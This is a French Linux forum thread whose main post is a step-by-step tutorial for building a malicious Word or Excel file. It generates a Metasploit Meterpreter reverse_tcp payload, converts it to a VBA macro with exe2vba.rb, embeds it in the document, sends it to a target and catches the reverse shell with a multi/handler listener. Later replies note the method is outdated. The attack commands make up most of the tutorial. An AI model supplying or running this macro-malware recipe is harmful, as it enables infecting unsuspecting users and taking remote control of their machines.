user@linuxtrack:~ $ python -c 'print("Soyez les bienvenus !")'

Vous n'êtes pas identifié(e).

#1 15-02-2014 12:02:52

IceF0x
#! Gourou Linux

[Tuto]Créer un fichier Office infecté avec un payload sous Kali 1.0.6

Étape 1: Créer votre propre payload

Voici un exemples à vous d'adapter..

msfpayload windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=443 X > /tmp/payload.exe

Étape 2: Convertissez votre payload créé en VBA (Visual Basic for Application) script

Déplacez vous dans le répertoire contenant l'outil de conversion de votre payload.

cd /usr/share/metasploit-framework/tools/

Et utilisez le script exe2vba.rb pour convertir votre payload.

./exe2vba.rb /tmp/payload.exe /tmp/payload.vba

1392457831.png

Étape 3: copiez et collez le contenu de votre payload dans votre fichier Office.

Le fichier se compose de 2 partie:

La partie Visual Basic se copie dans la macro.

Les données. la partie hexadécimal doit être ajouté à la fin du contenu du document.

1392458481.png

Voici l'aide pour office 2010:

http://office.microsoft.com/fr-be/word- … 99769.aspx

http://office.microsoft.com/fr-be/excel … 14112.aspx

Ouvrez votre fichier à infecter (Excel ou Word), sélectionner: Outils>Macro>Visual Basic Editor, collez le contenu de votre payload.vba, puis enregistrez le fichier.

vbe.png

Étape 4: Envoyez le fichier infecté à votre client.

Là comme il s'agit d'un test j'ai simplement copié collé avec une clé USB le fichier sur mon PC test, pour les transferts à l'insu d'une victime potentielle c'est pas sur ce forum.

Étape 5: Attendez que la connexion avec le client s'établisse.

msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST <IP>
msf > set LPORT 443
msf > exploit

Utiliser des logiciels propriétaires, c'est comme les plats préparés, on est incapable de dire les conservateurs qu'ils contiennent, on dira toujours que c'est bon, mais ça ne remplacera jamais le repas fait maison par sa maman.
]:D #! Crunchbang & Archlinux GNU/Linux User ]:D

Hors ligne

#2 21-10-2023 14:22:50

wemosd1
Membre

Re : [Tuto]Créer un fichier Office infecté avec un payload sous Kali 1.0.6

Est ce encore d'actualité?

Hors ligne

#3 23-11-2023 06:49:34

IceF0x
#! Gourou Linux

Re : [Tuto]Créer un fichier Office infecté avec un payload sous Kali 1.0.6

wemosd1 a écrit :

Est ce encore d'actualité?

depuis 2014 non évidemment.


Utiliser des logiciels propriétaires, c'est comme les plats préparés, on est incapable de dire les conservateurs qu'ils contiennent, on dira toujours que c'est bon, mais ça ne remplacera jamais le repas fait maison par sa maman.
]:D #! Crunchbang & Archlinux GNU/Linux User ]:D

Hors ligne

Pied de page des forums